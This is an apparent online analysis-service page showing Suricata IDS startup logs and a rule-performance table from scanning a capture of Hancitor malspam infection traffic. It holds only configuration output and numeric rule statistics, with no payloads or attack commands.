Filename: 2018-09-04-Hancitor-malspam-infection-traffic.pcap
Status: Analysis complete
IDS: suricata-4.0.0
Ruleset: etopen-all
Runtime: 9.6578681469 seconds
Hash: 90a60290858e08e0e9d5f7a4d55e5dab
Uploaded: 1550829391

Logfiles


suricata-report-2019-02-22-T-09-56-41-01282019.1218-2018-09-04-Hancitor-malspam-infection-traffic.pcap.txt - (18146 bytes) - download
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
lastcmd:ulimit -c unlimited; /opt/suricata400/bin/suricata -c /opt/suricata400/etc/etopen/suricata400-etopen-all.yaml -l /var/www/html/90a60290858e08e0e9d5f7a4d55e5dabd2a6d3ad9c956d904083161fa55f2f7a -r /var/pcap/01282019.1218-2018-09-04-Hancitor-malspam-infection-traffic.pcap -vvv -k none
elapsedtime:8.744518
stderr:
stdout:
22/2/2019 -- 09:56:32 - <Info> - Configuration node 'rule-files' redefined.
22/2/2019 -- 09:56:32 - <Notice> - This is Suricata version 4.0.0 RELEASE
22/2/2019 -- 09:56:32 - <Info> - CPUs/cores online: 1
22/2/2019 -- 09:56:32 - <Config> - 'default' server has 'request-body-minimal-inspect-size' set to 33078 and 'request-body-inspect-window' set to 17091 after randomization.
22/2/2019 -- 09:56:32 - <Config> - 'default' server has 'response-body-minimal-inspect-size' set to 33401 and 'response-body-inspect-window' set to 16619 after randomization.
22/2/2019 -- 09:56:32 - <Config> - DNS request flood protection level: 500
22/2/2019 -- 09:56:32 - <Config> - DNS per flow memcap (state-memcap): 524288
22/2/2019 -- 09:56:32 - <Config> - DNS global memcap: 16777216
22/2/2019 -- 09:56:32 - <Config> - allocated 262144 bytes of memory for the host hash... 4096 buckets of size 64
22/2/2019 -- 09:56:32 - <Config> - preallocated 1000 hosts of size 136
22/2/2019 -- 09:56:32 - <Config> - host memory usage: 398144 bytes, maximum: 16777216
22/2/2019 -- 09:56:32 - <Config> - using magic-file /usr/share/file/magic
22/2/2019 -- 09:56:32 - <Config> - Core dump size is unlimited.
22/2/2019 -- 09:56:32 - <Config> - allocated 3670016 bytes of memory for the defrag hash... 65536 buckets of size 56
22/2/2019 -- 09:56:32 - <Config> - preallocated 1000 defrag trackers of size 168
22/2/2019 -- 09:56:32 - <Config> - defrag memory usage: 3838016 bytes, maximum: 33554432
22/2/2019 -- 09:56:32 - <Config> - stream "prealloc-sessions": 2048 (per thread)
22/2/2019 -- 09:56:32 - <Config> - stream "memcap": 33554432
22/2/2019 -- 09:56:32 - <Config> - stream "midstream" session pickups: disabled
22/2/2019 -- 09:56:32 - <Config> - stream "async-oneside": disabled
22/2/2019 -- 09:56:32 - <Config> - stream "checksum-validation": disabled
22/2/2019 -- 09:56:32 - <Config> - stream."inline": disabled
22/2/2019 -- 09:56:32 - <Config> - stream "bypass": disabled
22/2/2019 -- 09:56:32 - <Config> - stream "max-synack-queued": 5
22/2/2019 -- 09:56:32 - <Config> - stream.reassembly "memcap": 134217728
22/2/2019 -- 09:56:32 - <Config> - stream.reassembly "depth": 0
22/2/2019 -- 09:56:32 - <Config> - stream.reassembly "toserver-chunk-size": 2651
22/2/2019 -- 09:56:32 - <Config> - stream.reassembly "toclient-chunk-size": 2596
22/2/2019 -- 09:56:32 - <Config> - stream.reassembly.raw: enabled
22/2/2019 -- 09:56:32 - <Config> - stream.reassembly "segment-prealloc": 2048
22/2/2019 -- 09:56:32 - <Config> - Delayed detect disabled
22/2/2019 -- 09:56:32 - <Config> - pattern matchers: MPM: ac, SPM: bm
22/2/2019 -- 09:56:32 - <Config> - grouping: tcp-whitelist (default) 53, 80, 139, 443, 445, 1433, 3306, 3389, 6666, 6667, 8080
22/2/2019 -- 09:56:32 - <Config> - grouping: udp-whitelist (default) 53, 135, 5060
22/2/2019 -- 09:56:32 - <Config> - prefilter engines: MPM
22/2/2019 -- 09:56:32 - <Config> - IP reputation disabled
22/2/2019 -- 09:56:32 - <Perf> - Registered 148 keyword profiling counters.
22/2/2019 -- 09:56:32 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-ftp.rules
22/2/2019 -- 09:56:32 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-policy.rules
22/2/2019 -- 09:56:32 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-trojan.rules
22/2/2019 -- 09:56:33 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-games.rules
22/2/2019 -- 09:56:33 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-pop3.rules
22/2/2019 -- 09:56:33 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-user_agents.rules
22/2/2019 -- 09:56:33 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-activex.rules
22/2/2019 -- 09:56:33 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-rpc.rules
22/2/2019 -- 09:56:33 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-attack_response.rules
22/2/2019 -- 09:56:33 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-icmp.rules
22/2/2019 -- 09:56:33 - <Config> - No rules loaded from ET-emerging-icmp.rules.
22/2/2019 -- 09:56:33 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-scan.rules
22/2/2019 -- 09:56:33 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-voip.rules
22/2/2019 -- 09:56:33 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-chat.rules
22/2/2019 -- 09:56:33 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-icmp_info.rules
22/2/2019 -- 09:56:33 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-info.rules
22/2/2019 -- 09:56:33 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-shellcode.rules
22/2/2019 -- 09:56:34 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-web_client.rules
22/2/2019 -- 09:56:34 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-imap.rules
22/2/2019 -- 09:56:34 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-web_server.rules
22/2/2019 -- 09:56:34 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-current_events.rules
22/2/2019 -- 09:56:34 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-inappropriate.rules
22/2/2019 -- 09:56:34 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-smtp.rules
22/2/2019 -- 09:56:34 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-web_specific_apps.rules
22/2/2019 -- 09:56:36 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-deleted.rules
22/2/2019 -- 09:56:36 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-malware.rules
22/2/2019 -- 09:56:36 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-snmp.rules
22/2/2019 -- 09:56:36 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-worm.rules
22/2/2019 -- 09:56:36 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-dns.rules
22/2/2019 -- 09:56:36 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-misc.rules
22/2/2019 -- 09:56:36 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-sql.rules
22/2/2019 -- 09:56:36 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-dos.rules
22/2/2019 -- 09:56:36 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-netbios.rules
22/2/2019 -- 09:56:36 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-telnet.rules
22/2/2019 -- 09:56:36 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-exploit.rules
22/2/2019 -- 09:56:36 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-p2p.rules
22/2/2019 -- 09:56:36 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-tftp.rules
22/2/2019 -- 09:56:36 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-mobile_malware.rules
22/2/2019 -- 09:56:37 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-botcc.rules
22/2/2019 -- 09:56:37 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-compromised.rules
22/2/2019 -- 09:56:37 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-drop.rules
22/2/2019 -- 09:56:37 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-dshield.rules
22/2/2019 -- 09:56:37 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-tor.rules
22/2/2019 -- 09:56:37 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-ciarmy.rules
22/2/2019 -- 09:56:37 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/local.rules
22/2/2019 -- 09:56:37 - <Config> - No rules loaded from local.rules.
22/2/2019 -- 09:56:37 - <Info> - 44 rule files processed. 18236 rules successfully loaded, 0 rules failed
22/2/2019 -- 09:56:37 - <Info> - Threshold config parsed: 0 rule(s) found
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for tcp-packet
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for tcp-stream
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for udp-packet
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for other-ip
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for http_uri
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for http_request_line
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for http_client_body
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for http_response_line
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for http_header
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for http_header
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for http_header_names
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for http_header_names
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for http_accept
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for http_accept_enc
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for http_accept_lang
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for http_referer
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for http_connection
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for http_content_len
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for http_content_len
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for http_content_type
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for http_content_type
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for http_protocol
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for http_protocol
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for http_start
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for http_start
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for http_raw_header
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for http_raw_header
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for http_method
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for http_cookie
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for http_cookie
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for http_raw_uri
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for http_user_agent
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for http_host
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for http_raw_host
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for http_stat_msg
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for http_stat_code
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for dns_query
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for tls_sni
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for tls_cert_issuer
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for tls_cert_subject
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for tls_cert_serial
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for dce_stub_data
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for dce_stub_data
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for ssh_protocol
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for ssh_protocol
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for ssh_software
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for ssh_software
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for file_data
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for file_data
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for http_request_line
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for http_response_line
22/2/2019 -- 09:56:37 - <Info> - 18241 signatures processed. 1175 are IP-only rules, 6125 are inspecting packet payload, 13172 inspect application layer, 0 are decoder event only
22/2/2019 -- 09:56:37 - <Config> - building signature grouping structure, stage 1: preprocessing rules... complete
22/2/2019 -- 09:56:37 - <Perf> - TCP toserver: 41 port groups, 40 unique SGH's, 1 copies
22/2/2019 -- 09:56:37 - <Perf> - TCP toclient: 21 port groups, 21 unique SGH's, 0 copies
22/2/2019 -- 09:56:37 - <Perf> - UDP toserver: 41 port groups, 33 unique SGH's, 8 copies
22/2/2019 -- 09:56:37 - <Perf> - UDP toclient: 21 port groups, 15 unique SGH's, 6 copies
22/2/2019 -- 09:56:37 - <Perf> - OTHER toserver: 254 proto groups, 2 unique SGH's, 252 copies
22/2/2019 -- 09:56:37 - <Perf> - OTHER toclient: 254 proto groups, 0 unique SGH's, 254 copies
22/2/2019 -- 09:56:38 - <Perf> - Unique rule groups: 111
22/2/2019 -- 09:56:38 - <Perf> - Builtin MPM "toserver TCP packet": 31
22/2/2019 -- 09:56:38 - <Perf> - Builtin MPM "toclient TCP packet": 20
22/2/2019 -- 09:56:38 - <Perf> - Builtin MPM "toserver TCP stream": 31
22/2/2019 -- 09:56:38 - <Perf> - Builtin MPM "toclient TCP stream": 21
22/2/2019 -- 09:56:38 - <Perf> - Builtin MPM "toserver UDP packet": 33
22/2/2019 -- 09:56:38 - <Perf> - Builtin MPM "toclient UDP packet": 15
22/2/2019 -- 09:56:38 - <Perf> - Builtin MPM "other IP packet": 2
22/2/2019 -- 09:56:38 - <Perf> - AppLayer MPM "toserver http_uri": 8
22/2/2019 -- 09:56:38 - <Perf> - AppLayer MPM "toserver http_request_line": 1
22/2/2019 -- 09:56:38 - <Perf> - AppLayer MPM "toserver http_client_body": 6
22/2/2019 -- 09:56:38 - <Perf> - AppLayer MPM "toclient http_response_line": 1
22/2/2019 -- 09:56:38 - <Perf> - AppLayer MPM "toserver http_header": 6
22/2/2019 -- 09:56:38 - <Perf> - AppLayer MPM "toclient http_header": 3
22/2/2019 -- 09:56:38 - <Perf> - AppLayer MPM "toserver http_header_names": 1
22/2/2019 -- 09:56:38 - <Perf> - AppLayer MPM "toserver http_accept": 1
22/2/2019 -- 09:56:38 - <Perf> - AppLayer MPM "toserver http_referer": 1
22/2/2019 -- 09:56:38 - <Perf> - AppLayer MPM "toserver http_content_len": 1
22/2/2019 -- 09:56:38 - <Perf> - AppLayer MPM "toserver http_content_type": 1
22/2/2019 -- 09:56:38 - <Perf> - AppLayer MPM "toclient http_content_type": 1
22/2/2019 -- 09:56:38 - <Perf> - AppLayer MPM "toserver http_start": 1
22/2/2019 -- 09:56:38 - <Perf> - AppLayer MPM "toserver http_raw_header": 1
22/2/2019 -- 09:56:38 - <Perf> - AppLayer MPM "toclient http_raw_header": 1
22/2/2019 -- 09:56:38 - <Perf> - AppLayer MPM "toserver http_method": 3
22/2/2019 -- 09:56:38 - <Perf> - AppLayer MPM "toserver http_cookie": 1
22/2/2019 -- 09:56:38 - <Perf> - AppLayer MPM "toclient http_cookie": 2
22/2/2019 -- 09:56:38 - <Perf> - AppLayer MPM "toserver http_raw_uri": 1
22/2/2019 -- 09:56:38 - <Perf> - AppLayer MPM "toserver http_user_agent": 4
22/2/2019 -- 09:56:38 - <Perf> - AppLayer MPM "toserver http_host": 2
22/2/2019 -- 09:56:38 - <Perf> - AppLayer MPM "toclient http_stat_code": 1
22/2/2019 -- 09:56:38 - <Perf> - AppLayer MPM "toserver dns_query": 4
22/2/2019 -- 09:56:38 - <Perf> - AppLayer MPM "toserver tls_sni": 1
22/2/2019 -- 09:56:38 - <Perf> - AppLayer MPM "toclient tls_cert_issuer": 2
22/2/2019 -- 09:56:38 - <Perf> - AppLayer MPM "toclient tls_cert_subject": 1
22/2/2019 -- 09:56:38 - <Perf> - AppLayer MPM "toclient tls_cert_serial": 1
22/2/2019 -- 09:56:38 - <Perf> - AppLayer MPM "toserver ssh_protocol": 1
22/2/2019 -- 09:56:38 - <Perf> - AppLayer MPM "toserver file_data": 1
22/2/2019 -- 09:56:38 - <Perf> - AppLayer MPM "toclient file_data": 5
22/2/2019 -- 09:56:39 - <Perf> - Registered 18241 rule profiling counters.
22/2/2019 -- 09:56:39 - <Info> - fast output device (regular) initialized: alert
22/2/2019 -- 09:56:39 - <Info> - eve-log output device (regular) initialized: eve.json
22/2/2019 -- 09:56:39 - <Config> - enabling 'eve-log' module 'alert'
22/2/2019 -- 09:56:39 - <Config> - enabling 'eve-log' module 'http'
22/2/2019 -- 09:56:39 - <Config> - enabling 'eve-log' module 'dns'
22/2/2019 -- 09:56:39 - <Config> - enabling 'eve-log' module 'tls'
22/2/2019 -- 09:56:39 - <Config> - enabling 'eve-log' module 'files'
22/2/2019 -- 09:56:39 - <Config> - enabling 'eve-log' module 'ssh'
22/2/2019 -- 09:56:39 - <Info> - Unified2-alert initialized: filename unified2.alert, limit 32 MB
2

This file has been truncated. Go here to download in full.


suricata-4.0.0-etopen-all-perf.txt-2019-02-22-T-09-56-41-01282019.1218-2018-09-04-Hancitor-malspam-infection-traffic.pcap.txt - (48982 bytes) - download
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
  --------------------------------------------------------------------------
  Date: 2/22/2019 -- 09:56:41. Sorted by: max ticks.
  --------------------------------------------------------------------------
   Num      Rule         Gid      Rev      Ticks        %      Checks   Matches  Max Ticks   Avg Ticks   Avg Match   Avg No Match
  -------- ------------ -------- -------- ------------ ------ -------- -------- ----------- ----------- ----------- -------------- 
  1        2022547      1        1        20523329     7.12   737      0        18373403    27847.12    0.00        27847.12   
  2        2018452      1        15       6055735      2.10   2        0        5964801     3027867.50  0.00        3027867.50 
  3        2024778      1        1        5929037      2.06   84       0        5695016     70583.77    0.00        70583.77   
  4        2017552      1        6        11250855     3.90   393      0        5340401     28628.13    0.00        28628.13   
  5        2022627      1        12       29504800     10.24  162      0        568782      182128.40   0.00        182128.40  
  6        2022535      1        11       14369699     4.99   162      0        482230      88701.85    0.00        88701.85   
  7        2023476      1        5        16995729     5.90   162      0        478810      104911.91   0.00        104911.91  
  8        2021887      1        2        3096089      1.07   162      0        418162      19111.66    0.00        19111.66   
  9        2021863      1        3        3044973      1.06   162      0        408798      18796.13    0.00        18796.13   
  10       2020865      1        3        1442398      0.50   9        0        262480      160266.44   0.00        160266.44  
  11       2012612      1        16       1462194      0.51   63       0        194288      23209.43    0.00        23209.43   
  12       2012520      1        7        163033       0.06   1        1        163033      163033.00   163033.00   0.00       
  13       2024606      1        2        1363982      0.47   61       0        140195      22360.36    0.00        22360.36   
  14       2020855      1        3        3475716      1.21   64       0        137195      54308.06    0.00        54308.06   
  15       2021749      1        6        205964       0.07   2        0        136709      102982.00   0.00        102982.00  
  16       2024769      1        2        292654       0.10   3        0        114737      97551.33    0.00        97551.33   
  17       2023496      1        3        8079863      2.80   162      0        98116       49875.70    0.00        49875.70   
  18       2022050      1        3        96931        0.03   1        0        96931       96931.00    0.00        96931.00   
  19       2018457      1        1        5213136      1.81   164      0        93901       31787.41    0.00        31787.41   
  20       2021864      1        3        2731130      0.95   162      0        91840       16858.83    0.00        16858.83   
  21       2015877      1        6        1959180      0.68   61       0        89796       32117.70    0.00        32117.70   
  22       2024549      1        2        396972       0.14   6        0        84589       66162.00    0.00        66162.00   
  23       2022502      1        4        3262693      1.13   65       0        82792       50195.28    0.00        50195.28   
  24       2019094      1        5        2488578      0.86   63       0        82367       39501.24    0.00        39501.24   
  25       2018005      1        6        7272928      2.52   164      0        81134       44347.12    0.00        44347.12   
  26       2021896      1        2        2579474      0.89   162      0        80439       15922.68    0.00        15922.68   
  27       2019343      1        3        1826229      0.63   64       0        79861       28534.83    0.00        28534.83   
  28       2019707      1        2        316826       0.11   5        0        78683       63365.20    0.00        63365.20   
  29       2021902      1        2        2715622      0.94   162      0        75119       16763.10    0.00        16763.10   
  30       2024771      1        1        1984069      0.69   322      0        74630       6161.70     0.00        6161.70    
  31       2017259      1        12       2935928      1.02   59       0        74528       49761.49    0.00        49761.49   
  32       2023521      1        2        2645923      0.92   162      0        74480       16332.86    0.00        16332.86   
  33       2021038      1        4        1730961      0.60   59       0        74326       29338.32    0.00        29338.32   
  34       2019837      1        3        92484        0.03   8        1        72856       11560.50    72856.00    2804.00    
  35       2014411      1        11       138231       0.05   2        2        72410       69115.50    69115.50    0.00       
  36       2021413      1        2        2102278      0.73   61       0        70713       34463.57    0.00        34463.57   
  37       2021843      1        2        2737900      0.95   162      0        68841       16900.62    0.00        16900.62   
  38       2017748      1        6        277044       0.10   16       0        67410       17315.25    0.00        17315.25   
  39       2023405      1        2        2715937      0.94   162      0        67406       16765.04    0.00        16765.04   
  40       2017261      1        3        2436138      0.85   61       0        65531       39936.69    0.00        39936.69   
  41       2021868      1        2        2661394      0.92   162      0        64868       16428.36    0.00        16428.36   
  42       2022901      1        2        2471414      0.86   61       0        64466       40514.98    0.00        40514.98   
  43       2022609      1        2        1820231      0.63   63       0        63188       28892.56    0.00        28892.56   
  44       2013250      1        3        62654        0.02   1        0        62654       62654.00    0.00        62654.00   
  45       2009702      1        5        355686       0.12   24       0        62095       14820.25    0.00        14820.25   
  46       2025064      1        5        2462113      0.85   66       0        59788       37304.74    0.00        37304.74   
  47       2017948      1        2        2084197      0.72   63       0        58749       33082.49    0.00        33082.49   
  48       2014956      1        1        497406       0.17   34       0        58700       14629.59    0.00        14629.59   
  49       2012707      1        5        1474142      0.51   66       0        58101       22335.48    0.00        22335.48   
  50       2014701      1        12       342588       0.12   24       0        58036       14274.50    0.00        14274.50   
  51       2021897      1        2        2712582      0.94   162      0        57668       16744.33    0.00        16744.33   
  52       2009387      1        4        806454       0.28   229      0        56555       3521.63     0.00        3521.63    
  53       2024573      1        2        1279413      0.44   59       0        55752       21684.97    0.00        21684.97   
  54       2021308      1        2        1635232      0.57   59       0        54717       27715.80    0.00        27715.80   
  55       2021418      1        9        2424829      0.84   61       0        54299       39751.30    0.00        39751.30   
  56       2024178      1        2        75096        0.03   2        0        52150       37548.00    0.00        37548.00   
  57       2023168      1        2        2664957      0.92   162      0        52001       16450.35    0.00        16450.35   
  58       2018982      1        2        51199        0.02   1        0        51199       51199.00    0.00        51199.00   
  59       2020569      1        1        51191        0.02   1        0        51191       51191.00    0.00        51191.00   
  60       2016706      1        20       1304176      0.45   61       0        51028       21379.93    0.00        21379.93   
  61       2020781      1        5        88037        0.03   3        0        50989       29345.67    0.00        29345.67   
  62       2008306      1        3        971485       0.34   328      0        50289       2961.84     0.00        2961.84    
  63       2021888      1        2        2647743      0.92   162      0        49869       16344.09    0.00        16344.09   
  64       2014519      1        7        229578       0.08   10       0        49627       22957.80    0.00        22957.80   
  65       2021844      1        2        2702191      0.94   162      0        49307       16680.19    0.00        16680.19   
  66       2021631      1        2        1247782      0.43   59       0        48775       21148.85    0.00        21148.85   
  67       2016858      1        10       94911        0.03   2        0        47471       47455.50    0.00        47455.50   
  68       2021869      1        2        2672164      0.93   162      0        47143       16494.84    0.00        16494.84   
  69       2020181      1        8        2025633      0.70   61       0        46991       33207.10    0.00        33207.10   
  70       2023350      1        2        2576454      0.89   162      0        46898       15904.04    0.00        15904.04   
  71       2021950      1        2        2601177      0.90   162      0        46484       16056.65    0.00        16056.65   
  72       2023315      1        2        81056        0.03   2        0        46340       40528.00    0.00        40528.00   
  73       2022207      1        4        74312        0.03   2        0        45938       37156.00    0.00        37156.00   
  74       2024605      1        2        44971        0.02   1        0        44971       44971.00    0.00        44971.00   
  75       2024829      1        2        152231       0.05   6        0        44191       25371.83    0.00        25371.83   
  76       2021920      1        2        2616974      0.91   162      0        44040       16154.16    0.00        16154.16   
  77       2008438      1        20       43938        0.02   1        0        43938       43938.00    0.00        43938.00   
  78       2016537      1        2        4681680      1.62   327      0        43427       14317.06    0.00        14317.06   
  79       2022339      1        2        82502        0.03   2        0        43224       41251.00    0.00        41251.00   
  80       2025180      1        1        1213612      0.42   59       0        43215       20569.69    0.00        20569.69   
  81       2020708      1        2        1190684      0.41   59       0        42853       20181.08    0.00        20181.08   
  82       2022552      1        2        1833328      0.64   87       0        42820       21072.74    0.00        21072.74   
  83       2022959      1        2        2657632      0.92   162      0        41358       16405.14    0.00        16405.14   
  84       2023875      1        2        79869        0.03   2        0        40794       39934.50    0.00        39934.50   
  85       2103159      1        4        946799       0.33   326      0        40114       2904.29     0.00        2904.29    
  86       2023611      1        3        115265       0.04   4        0        40022       28816.25    0.00        28816.25   
  87       2021312      1        2        135761       0.05   8        0        39921       16970.12    0.00        16970.12   
  88       2019141      1        3        150195       0.05   4        0        39275       37548.75    0.00        37548.75   
  89       2020791      1        3        75848        0.03   3        0        39023       25282.67    0.00        25282.67   
  90       2014967      1        3        1269375      0.44   61       0        38993       20809.43    0.00        20809.43   
  91       2019165      1        3        135382       0.05   8        0        38824       16922.75    0.00        16922.75   
  92       2103158      1        6        1914724      0.66   653      0        38323       2932.20     0.00        2932.20    
  93       2019881      1        3        68336        0.02   2        0        38293       34168.00    0.00        34168.00   
  94       2023522      1        2        2655665      0.92   162      0        38252       16392.99    0.00        16392.99   
  95       2019345      1        2        768067       0.27   54       0        37674       14223.46    0.00        14223.46   
  96       2014380      1        4        2250411      0.78   122      0        37484       18445.99    0.00        18445.99   
  97       2018959      1        3        253861       0.09   8        0        37370       31732.62    0.00        31732.62   
  98       2018358      1        7        73695        0.03   2        0        37145       36847.50    0.00        36847.50   
  99       2014353      1        6        217586       0.08   8        0        36922       27198.25    0.00        27198.25   
  100      2100327      1        10       511287       0.18   165      0        36853       3098.71     0.00        3098.71    
  101      2020607      1        3        55885        0.02   2        0        36807       27942.50    0.00        27942.50   
  102      2024767      1        2        72111        0.03   2        0        36789       36055.50    0.00        36055.50   
  103      2021997      1        3        36351        0.01   1        1        36351       36351.00    36351.00    0.00       
  104      2021605      1        4        94838        0.03   4        0        36092       23709.50    0.00        23709.50   
  105      2020767      1        2        73771        0.03   3        0        36059       24590.33    0.00        24590.33   
  106      2018153      1        4        74717        0.03   3        0        35812       24905.67    0.00        24905.67   
  107      2022503      1        2        70225        0.02   2        0        35710       35112.50    0.00        35112.50   
  108      2022679      1        4        71097        0.02   2        0        35668       35548.50    0.00        35548.50   
  109      2018496      1        9        64559        0.02   2        0        35182       32279.50    0.00        32279.50   
  110      2024601      1        2        34834        0.01   1        0        34834       34834.00    0.00        34834.00   
  111      2009909      1        10       34394        0.01   1        0        34394       34394.00    0.00        34394.00   
  112      2009897      1        14       33873        0.01   1        0        33873       33873.00    0.00        33873.00   
  113      2021894      1        2        2542979      0.88   162      0        33848       15697.40    0.00        15697.40   
  114      2020421      1        2        130151       0.05   8        0        33694       16268.88    0.00        16268.88   
